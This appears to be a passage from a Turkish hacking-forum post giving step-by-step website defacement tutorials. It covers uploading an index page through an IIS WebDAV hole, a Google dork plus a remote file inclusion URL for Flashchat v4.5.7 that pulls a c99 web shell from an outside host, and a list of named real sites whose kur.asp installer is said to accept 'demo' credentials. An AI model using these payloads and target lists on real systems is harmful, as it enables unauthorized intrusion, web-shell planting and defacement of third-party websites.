Öyle Yaparsak Adresine Girdiğimizde Bizim Hazırladığımız İndex Dosyasını Görürüz) Ve Web Folders da Açmış Olduğumuz Siteye Sürükleyerek Gönderelim.Eğer İçerde Dosya Var İse İndex İn İsmi Aynen Kalsın Siz Sadece Sürükle Yöntemiyle Yollayın.(Dosyalar Çıkarsa Direk Adresine Girdiğimizde Bizim Dosyayı Görürüz) Burada Iss Açığı ile iki Dakika da index Atmayı Öğrendik Çok Kolay Bir Yoldur. direk linkte çıkar.
Evet Arkadaşlar Iss Açığı olan tüm sitelerde işe yarar tamam. iyi Hackler...
3:Flashchat v4.5.7
Ders 1
Google Yazılacak:Flashchat v4.5.7
Sonra Birkaç Sayfa İlerle Birini Seç
Seçtigimiz sitenini sonuna bu kodu yazarak c99 Kullanıoruz.
Kod=/inc/cmses/aedating4CMS.php?dir[inc]=http://darkearth.by.ru/c99.txt?
4:Haber sitesi hackleme
Şimdi arklar http://cekicgroup.com/ bu siteyi hackleyeçez demi
sonuna kur.asp yazmamız yeterlidir
http://cekicgroup.com/kur.asp
http://cambalkon.ostim.net/kur.asp
http://www.annkara.com/kur.asp
http://www.herokulabilgisayar.com/kur.asp
ve devam tıklıoruz kullanıcı adı ve şifre demo oluo arklar
ve siteyi hacklemiş oluoz.
Daha önce verildiyse özür dilerim!!!
ALINTI!!
